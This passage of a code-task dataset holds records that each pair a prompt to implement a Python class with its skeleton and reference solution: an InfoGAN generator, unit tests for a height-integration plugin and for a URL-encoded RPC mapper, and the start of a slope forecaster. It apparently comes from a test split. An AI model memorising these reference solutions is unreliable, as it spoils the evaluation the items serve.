nn.ModuleList(BNs)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000029", "length_bytes": 19546, "license_type": "no_license", "methods": [{"docstring": "InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.", "name": "__init__", "signature": "def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1)"}, {"docstring": "Input the random noise plus latent codes to generate fake images.", "name": "forward", "signature": "def forward(self, x)"}], "n_methods": 2, "prompt": "Implement the Python class `InfoGAN_Generator` described below.\n\nClass description:\nImplement the InfoGAN_Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1): InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\n- def forward(self, x): Input the random noise plus latent codes to generate fake images.", "prompted_full_text": "Implement the Python class `InfoGAN_Generator` described below.\n\nClass description:\nImplement the InfoGAN_Generator class.\n\nMethod signatures and docstrings:\n- def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1): InfoGAN Generator, have an additional input branch for latent codes. 
Architecture brought from DCGAN.\n- def forward(self, x): Input the random noise plus latent codes to generate fake images.\n\n<|skeleton|>\nclass InfoGAN_Generator:\n\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n<|end_body_1|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass InfoGAN_Generator:\n\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. Architecture brought from DCGAN.\"\"\"\n <|body_0|>\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InfoGAN_Generator:\n def __init__(self, noise_dim=10, n_layer=3, n_conti=2, n_discrete=1, num_category=10, use_gpu=False, featmap_dim=256, n_channel=1):\n \"\"\"InfoGAN Generator, have an additional input branch for latent codes. 
Architecture brought from DCGAN.\"\"\"\n super(InfoGAN_Generator, self).__init__()\n self.n_layer = n_layer\n self.n_conti = n_conti\n self.n_discrete = n_discrete\n self.num_category = num_category\n n_input = noise_dim + n_conti + n_discrete * num_category\n self.featmap_dim = featmap_dim\n self.fc_in = nn.Linear(n_input, featmap_dim * 4 * 4)\n convs = []\n BNs = []\n for layer in range(self.n_layer):\n if layer == 0:\n n_conv_out = n_channel\n else:\n n_conv_out = featmap_dim / 2 ** (self.n_layer - layer)\n n_conv_in = featmap_dim / 2 ** (self.n_layer - layer - 1)\n n_width = 5 if layer == self.n_layer - 1 else 6\n _conv = nn.ConvTranspose2d(n_conv_in, n_conv_out, n_width, stride=2, padding=2)\n if use_gpu:\n _conv = _conv\n convs.append(_conv)\n if layer != 0:\n _BN = nn.BatchNorm2d(n_conv_out)\n if use_gpu:\n _BN = _BN\n BNs.append(_BN)\n self.convs = nn.ModuleList(convs)\n self.BNs = nn.ModuleList(BNs)\n\n def forward(self, x):\n \"\"\"Input the random noise plus latent codes to generate fake images.\"\"\"\n x = self.fc_in(x)\n x = x.view(-1, self.featmap_dim, 4, 4)\n for layer in range(self.n_layer):\n conv_layer = self.convs[self.n_layer - layer - 1]\n if layer == self.n_layer - 1:\n x = F.tanh(conv_layer(x))\n else:\n BN_layer = self.BNs[self.n_layer - layer - 2]\n x = F.relu(BN_layer(conv_layer(x)))\n return x\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_AaronYALai_Generative_Adversarial_Networks_PyTorch.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "f7c0618e8b1af213f6594ad1a6496f5de699e589", "bodies": ["height_points = np.array([5.0, 10.0, 20.0])\ncube = _set_up_height_cube(height_points)\nself.plugin_positive = Integration('height', positive_integration=True)\nself.plugin_positive.input_cube = cube.copy()\nself.plugin_negative = Integration('height')\nself.plugin_negative.input_cube = cube.copy()", "result = self.plugin_negative.prepare_for_integration()\nself.assertIsInstance(result, tuple)\nself.assertEqual(len(result), 2)\nself.assertIsInstance(result[0], iris.cube.Cube)\nself.assertIsInstance(result[1], iris.cube.Cube)", "result = self.plugin_positive.prepare_for_integration()\nself.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\nself.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))", "self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\nresult = self.plugin_negative.prepare_for_integration()\nself.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\nself.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))"], "bodies_text": "<|body_start_0|>\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n<|end_body_1|>\n\n<|body_start_2|>\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n 
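The InfoGAN_Generator record computes its channel counts with true division (`featmap_dim / 2 ** ...`), which produces floats and makes `nn.ConvTranspose2d` raise a TypeError under Python 3, and it routes the output through the long-deprecated `F.tanh`. A corrected sketch of just that arithmetic and the forward pass, assuming PyTorch and the record's default sizes (BatchNorm omitted for brevity):

import torch
import torch.nn as nn

n_layer, featmap_dim, n_channel = 3, 256, 1
convs = []
for layer in range(n_layer):
    # '//' keeps the channel counts integral, unlike the record's '/'.
    n_out = n_channel if layer == 0 else featmap_dim // 2 ** (n_layer - layer)
    n_in = featmap_dim // 2 ** (n_layer - layer - 1)
    width = 5 if layer == n_layer - 1 else 6
    convs.append(nn.ConvTranspose2d(n_in, n_out, width, stride=2, padding=2))

x = torch.randn(4, featmap_dim, 4, 4)  # output of the fc_in reshape
for i in range(n_layer):
    conv = convs[n_layer - i - 1]  # convs are applied in reverse order
    # torch.tanh replaces the deprecated torch.nn.functional.tanh.
    x = torch.tanh(conv(x)) if i == n_layer - 1 else torch.relu(conv(x))
print(x.shape)  # torch.Size([4, 1, 28, 28]) for these defaults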
self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n<|end_body_2|>\n\n<|body_start_3|>\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n<|end_body_3|>\n", "class_docstring": "Test the prepare_for_integration method.", "class_name": "Test_prepare_for_integration", "detected_licenses": ["BSD-3-Clause", "LicenseRef-scancode-proprietary-license"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n <|body_0|>\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n <|body_1|>\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n <|body_2|>\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n<|end_body_1|>\n\n<|body_start_2|>\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n<|end_body_2|>\n\n<|body_start_3|>\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000030", "length_bytes": 25011, "license_type": "permissive", "methods": [{"docstring": "Set up the cube.", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "Test that the type of the returned value is as expected and the expected number of items are returned.", "name": "test_basic", "signature": "def test_basic(self)"}, {"docstring": "Test that the expected coordinate points are returned for each cube when the direction of integration is positive.", "name": "test_positive_points", "signature": "def test_positive_points(self)"}, {"docstring": "Test that the expected coordinate points are returned for each cube when the direction of integration is negative.", "name": "test_negative_points", "signature": "def test_negative_points(self)"}], "n_methods": 4, "prompt": "Implement the Python class `Test_prepare_for_integration` 
described below.\n\nClass description:\nTest the prepare_for_integration method.\n\nMethod signatures and docstrings:\n- def setUp(self): Set up the cube.\n- def test_basic(self): Test that the type of the returned value is as expected and the expected number of items are returned.\n- def test_positive_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\n- def test_negative_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is negative.", "prompted_full_text": "Implement the Python class `Test_prepare_for_integration` described below.\n\nClass description:\nTest the prepare_for_integration method.\n\nMethod signatures and docstrings:\n- def setUp(self): Set up the cube.\n- def test_basic(self): Test that the type of the returned value is as expected and the expected number of items are returned.\n- def test_positive_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\n- def test_negative_points(self): Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\n\n<|skeleton|>\nclass Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n <|body_0|>\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n <|body_1|>\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n <|body_2|>\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n<|end_body_0|>\n\n<|body_start_1|>\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n<|end_body_1|>\n\n<|body_start_2|>\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n<|end_body_2|>\n\n<|body_start_3|>\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n<|end_body_3|>\n", "revision_id": "cd2c9019944345df1e703bf8f625db537ad9f559", "skeleton": "<|skeleton|>\nclass Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n <|body_0|>\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of 
items are returned.\"\"\"\n <|body_1|>\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n <|body_2|>\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Test_prepare_for_integration:\n \"\"\"Test the prepare_for_integration method.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the cube.\"\"\"\n height_points = np.array([5.0, 10.0, 20.0])\n cube = _set_up_height_cube(height_points)\n self.plugin_positive = Integration('height', positive_integration=True)\n self.plugin_positive.input_cube = cube.copy()\n self.plugin_negative = Integration('height')\n self.plugin_negative.input_cube = cube.copy()\n\n def test_basic(self):\n \"\"\"Test that the type of the returned value is as expected and the expected number of items are returned.\"\"\"\n result = self.plugin_negative.prepare_for_integration()\n self.assertIsInstance(result, tuple)\n self.assertEqual(len(result), 2)\n self.assertIsInstance(result[0], iris.cube.Cube)\n self.assertIsInstance(result[1], iris.cube.Cube)\n\n def test_positive_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is positive.\"\"\"\n result = self.plugin_positive.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([10.0, 20.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([5.0, 10.0]))\n\n def test_negative_points(self):\n \"\"\"Test that the expected coordinate points are returned for each cube when the direction of integration is negative.\"\"\"\n self.plugin_negative.input_cube.coord('height').points = np.array([20.0, 10.0, 5.0])\n result = self.plugin_negative.prepare_for_integration()\n self.assertArrayAlmostEqual(result[0].coord('height').points, np.array([20.0, 10.0]))\n self.assertArrayAlmostEqual(result[1].coord('height').points, np.array([10.0, 5.0]))\n", "source": "the_stack_v2_python_sparse", "source_path": "improver_tests/utilities/test_mathematical_operations.py", "source_repo": "metoppv/improver", "split": "test", "star_events_count": 101} {"blob_id": "6bdc62e4e294afedd8066db2a224373c030a7c6f", "bodies": ["self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\nurl_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\nrequest = url_encoded_mapper.build_request(self.service_handler, Request1)\nself.assertEquals(10, request.integer_field)\nself.assertEquals('a string', request.string_field)\nself.assertEquals(Enum1.VAL1, request.enum_field)", "self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\nurl_encoded_mapper = service_handlers.URLEncodedRPCMapper()\nself.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)", "response = Response1()\nresponse.integer_field = 10\nresponse.string_field = u'a string'\nresponse.enum_field = Enum1.VAL3\nurl_encoded_mapper = 
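The Test_prepare_for_integration record pins down the contract under test: `prepare_for_integration` splits a monotonic coordinate into two staggered cubes, one holding each interval's upper bound and one its lower bound. A plain-numpy sketch of that pairing (the improver `Integration` plugin itself is not reimplemented here):

import numpy as np

def staggered_bounds(points, positive_integration):
    # Pair each integration interval with its upper and lower coordinate,
    # matching the values asserted in the tests above.
    if positive_integration:
        return points[1:], points[:-1]
    return points[:-1], points[1:]

print(staggered_bounds(np.array([5.0, 10.0, 20.0]), True))   # [10. 20.], [ 5. 10.]
print(staggered_bounds(np.array([20.0, 10.0, 5.0]), False))  # [20. 10.], [10.  5.]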
service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\nurl_encoded_mapper.build_response(self.service_handler, response)\nself.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\nself.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})"], "bodies_text": "<|body_start_0|>\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n<|end_body_1|>\n\n<|body_start_2|>\n response = Response1()\n response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n<|end_body_2|>\n", "class_docstring": "Test the URL encoded RPC mapper.", "class_name": "URLEncodedRPCMapperTest", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "LGPL-2.0-or-later", "GPL-1.0-or-later", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n <|body_0|>\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n <|body_1|>\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n<|end_body_1|>\n\n<|body_start_2|>\n response = Response1()\n 
response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000031", "length_bytes": 46517, "license_type": "permissive", "methods": [{"docstring": "Test building request with parameter prefix.", "name": "testBuildRequest_Prefix", "signature": "def testBuildRequest_Prefix(self)"}, {"docstring": "Test trying to build request that causes a decode error.", "name": "testBuildRequest_DecodeError", "signature": "def testBuildRequest_DecodeError(self)"}, {"docstring": "Test building a response with parameter prefix.", "name": "testBuildResponse_Prefix", "signature": "def testBuildResponse_Prefix(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002050", "prompt": "Implement the Python class `URLEncodedRPCMapperTest` described below.\n\nClass description:\nTest the URL encoded RPC mapper.\n\nMethod signatures and docstrings:\n- def testBuildRequest_Prefix(self): Test building request with parameter prefix.\n- def testBuildRequest_DecodeError(self): Test trying to build request that causes a decode error.\n- def testBuildResponse_Prefix(self): Test building a response with parameter prefix.", "prompted_full_text": "Implement the Python class `URLEncodedRPCMapperTest` described below.\n\nClass description:\nTest the URL encoded RPC mapper.\n\nMethod signatures and docstrings:\n- def testBuildRequest_Prefix(self): Test building request with parameter prefix.\n- def testBuildRequest_DecodeError(self): Test trying to build request that causes a decode error.\n- def testBuildResponse_Prefix(self): Test building a response with parameter prefix.\n\n<|skeleton|>\nclass URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n <|body_0|>\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n <|body_1|>\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n<|end_body_0|>\n\n<|body_start_1|>\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n<|end_body_1|>\n\n<|body_start_2|>\n response = Response1()\n response.integer_field = 10\n 
response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n<|end_body_2|>\n", "revision_id": "72a05af97787001756bae2511b7985e61498c965", "skeleton": "<|skeleton|>\nclass URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n <|body_0|>\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n <|body_1|>\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class URLEncodedRPCMapperTest:\n \"\"\"Test the URL encoded RPC mapper.\"\"\"\n\n def testBuildRequest_Prefix(self):\n \"\"\"Test building request with parameter prefix.\"\"\"\n self.Reinitialize(urllib.urlencode([('prefix_integer_field', '10'), ('prefix_string_field', 'a string'), ('prefix_enum_field', 'VAL1')]), self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n request = url_encoded_mapper.build_request(self.service_handler, Request1)\n self.assertEquals(10, request.integer_field)\n self.assertEquals('a string', request.string_field)\n self.assertEquals(Enum1.VAL1, request.enum_field)\n\n def testBuildRequest_DecodeError(self):\n \"\"\"Test trying to build request that causes a decode error.\"\"\"\n self.Reinitialize(urllib.urlencode((('integer_field', '10'), ('integer_field', '20'))), content_type=self.content_type)\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper()\n self.assertRaises(service_handlers.RequestError, url_encoded_mapper.build_request, self.service_handler, Service.method1.remote.request_type)\n\n def testBuildResponse_Prefix(self):\n \"\"\"Test building a response with parameter prefix.\"\"\"\n response = Response1()\n response.integer_field = 10\n response.string_field = u'a string'\n response.enum_field = Enum1.VAL3\n url_encoded_mapper = service_handlers.URLEncodedRPCMapper(parameter_prefix='prefix_')\n url_encoded_mapper.build_response(self.service_handler, response)\n self.assertEquals('application/x-www-form-urlencoded', self.response.headers['content-type'])\n self.assertEquals(cgi.parse_qs(self.response.out.getvalue(), True, True), {'prefix_integer_field': ['10'], 'prefix_string_field': [u'a string'], 'prefix_enum_field': ['VAL3']})\n", "source": "the_stack_v2_python_sparse", "source_path": "third_party/catapult/third_party/gsutil/third_party/protorpc/protorpc/webapp/service_handlers_test.py", "source_repo": "metux/chromium-suckless", "split": "test", "star_events_count": 5} {"blob_id": "00aebdf3dfd86c7ea7580ca6118a1db55fb135ab", "bodies": ["self.slope = -1.0\nself.last_obs = -1.0\nself.last_obs_ind = -1\nself._fitted = False", "if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\nself.last_obs = y[-1]\nself.last_obs_ind = X[-1]\nif y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\nelse:\n self.slope = 
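The URLEncodedRPCMapperTest record is Python 2 code (`urllib.urlencode`, `cgi.parse_qs`, `u''` literals, `assertEquals`). The prefix round trip it exercises looks like this under Python 3's `urllib.parse`; the protorpc mapper itself is not reimplemented:

from urllib.parse import urlencode, parse_qs

prefix = 'prefix_'
fields = {'integer_field': 10, 'string_field': 'a string', 'enum_field': 'VAL3'}

# Encode with the parameter prefix, as build_response does in the record.
body = urlencode([(prefix + key, value) for key, value in fields.items()])

# Decode and strip the prefix again; parse_qs returns lists of values.
decoded = {key[len(prefix):]: values[0] for key, values in parse_qs(body).items()}
assert decoded == {'integer_field': '10', 'string_field': 'a string', 'enum_field': 'VAL3'}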
